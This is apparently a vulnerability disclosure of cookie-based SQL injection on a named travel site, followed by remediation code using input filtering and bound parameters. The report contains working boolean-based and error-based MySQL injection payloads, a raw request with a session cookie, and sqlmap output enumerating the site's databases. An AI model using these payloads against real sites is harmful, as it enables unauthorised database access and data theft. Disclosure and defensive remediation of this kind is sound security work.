Tuniu Tourism Network Cookie Injection Vulnerability

Source: Internet
Author: User

Visiting the home page and viewing the submitted request shows that the link parameters are submitted in the cookie. We detected a cookie injection vulnerability while fuzzing the parameters. This problem is serious and we hope it receives attention.
Detailed description:
GET /zhoubian/leyuan/ HTTP/1.1
Host: sy.tuniu.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://sy.tuniu.com/tours/311094
Cookie: tuniuuser_citycode=MTkwMg%3D%3D; tuniu_channel=region%3D; visit_history=311094; PHPSESSID=aq8r0pudtjl3t61vkss0i563o3
DNT: 1
Cache-Control: max-age=0

Cookie injection vulnerability found in visit_history=311094

sqlmap identified the following injection points with a total of 210 HTTP(s) requests:
---
Place: Cookie
Parameter: visit_history
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: tuniuuser_citycode = MTkwMg % 3D % 3D; tuniu_channel = Hangzhou % 3D; visit_history = 311094) AND 4608 = 4608 AND (9847 = 9847; PHPSESSID = Beijing

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: tuniuuser_citycode = MTkwMg % 3D % 3D; tuniu_channel = Hangzhou % 3D; visit_history = 311094) AND (SELECT 3540 FROM (select count (*), CONCAT (0x3a79756b3a, (SELECT (case when (3540 = 3540) THEN 1 ELSE 0 END), 0x3a6878653a, FLOOR (RAND (0) * 2) x FROM INFORMATION_SCHEMA.CHARACTER_SETS group by x)) AND (5085 = 5085; PHPSESSID = aq8r0pudtjl3t61vkss0i563o3
---

[11:03:27] [INFO] the back-end DBMS is MySQL
Web server operating system: Linux CentOS
Web application technology: PHP 5.3.3, Apache 2.2.15
Back-end DBMS: MySQL 5.0
[11:03:27] [INFO] fetching database names
[11:03:27] [WARNING] the SQL query provided does not return any output
[11:03:27] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
[11:03:27] [INFO] fetching number of databases
[11:03:27] [INFO] retrieved: 3
[11:03:31] [INFO] retrieving the length of query output
[11:03:31] [INFO] retrieved: 18
[11:03:50] [INFO] retrieved: information_schema
[11:03:50] [INFO] retrieving the length of query output
[11:03:50] [INFO] retrieved: 4
[11:03:59] [INFO] retrieved: test
[11:03:59] [INFO] retrieving the length of query output
[11:03:59] [INFO] retrieved: 5
[11:04:09] [INFO] retrieved: tuniu
Available databases [3]:
[*] information_schema
[*] test
[*] tuniu

[11:04:10] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 202 times
[11:04:10] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/sy.tuniu.com'
-------------------------------------------------------------
Use sqlmap to obtain database information
Available databases [3]:
[*] information_schema
[*] test
[*] tuniu

I did not continue any further. There are many problems. Please try again on WooYun if you have time ~~
Solution:
Parameter Filtering
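
One way to implement the parameter filtering named above, shown beside the concatenation pattern it replaces. This is an added example, not code from the original report or from the site. It assumes visit_history holds comma-separated numeric tour ids and that the query has an "id IN (...)" shape (inferred from the closing parenthesis at the start of the reported payload); the table, function names and the SQLite stand-in for MySQL are hypothetical.

```python
import re
import sqlite3

# Assumed cookie format: comma-separated numeric tour ids, already URL-decoded.
ID_LIST = re.compile(r"[0-9]{1,10}(?:,[0-9]{1,10})*")
MAX_IDS = 20  # arbitrary cap chosen for this example

# Payload shape from the sqlmap output in the report, spacing normalised.
REPORTED_PAYLOAD = "311094) AND 4608=4608 AND (9847=9847"


def make_db():
    """Constructed stand-in table; the site's real schema is not in the report."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tours (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO tours VALUES (?, ?)",
                   [(311094, "constructed tour A"), (311095, "constructed tour B")])
    return db


def parse_visit_history(value):
    """Allow-list filter: a list of ints, or [] for anything that is not id,id,..."""
    if not isinstance(value, str) or not ID_LIST.fullmatch(value):
        return []
    return [int(part) for part in value.split(",")][:MAX_IDS]


def history_concatenated(db, value):
    """Pattern to avoid: cookie text becomes part of the SQL statement."""
    sql = "SELECT id, title FROM tours WHERE id IN (" + value + ")"
    return db.execute(sql).fetchall()


def history_filtered(db, value):
    """Filter first, then bind the ids as parameters instead of concatenating."""
    ids = parse_visit_history(value)
    if not ids:
        return []
    marks = ",".join("?" for _ in ids)
    sql = "SELECT id, title FROM tours WHERE id IN (" + marks + ")"
    return db.execute(sql, ids).fetchall()


if __name__ == "__main__":
    db = make_db()
    for cookie in ("311094", "311094,311095", REPORTED_PAYLOAD):
        print(repr(cookie), parse_visit_history(cookie), history_filtered(db, cookie))
```

On the PHP and MySQL stack that sqlmap fingerprinted, the same two steps map to an integer allow-list check on the cookie followed by a prepared statement with bound parameters.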